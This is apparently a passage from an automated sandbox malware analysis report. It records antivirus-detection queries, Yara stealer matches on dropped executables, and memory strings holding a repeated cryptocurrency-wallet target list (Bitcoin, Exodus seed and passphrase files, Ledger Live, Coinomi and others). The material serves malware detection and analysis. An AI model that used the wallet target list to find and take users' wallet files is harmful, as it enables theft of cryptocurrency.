                              Source: 85746525a0.exe, 0000000B.00000003.2926346115.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.000000000177D000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3595404950.000000000176F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe, type: DROPPED
                              Source: Yara matchFile source: 0.2.file.exe.bc0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.skotes.exe.ea0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 2.2.skotes.exe.ea0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000002.00000002.1747399755.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1720616098.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1741470474.0000000000EA1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: bc893816fa.exe PID: 3400, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 85746525a0.exe PID: 7908, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 944, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ed7d415177.exe PID: 280, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: 0000001A.00000003.3064139165.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001A.00000002.3668631588.000000000071E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000003.3214718315.0000000005640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 7728, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 21.0.bb31c9d4a53941b6b913f33980d23feb.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000C.00000002.2959431174.0000000003497000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 81d22383f9.exe PID: 7712, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: bb31c9d4a53941b6b913f33980d23feb.exe PID: 2792, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: d0e32932f8.exe PID: 6672, type: MEMORYSTR
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\Electrum\wallets
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\ElectronCash\wallets
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                              Source: 85746525a0.exe, 0000000B.00000002.3044100078.0000000000B68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                              Source: 85746525a0.exeString found in binary or memory: %appdata%\Ethereum
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: 85746525a0.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                              Source: d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
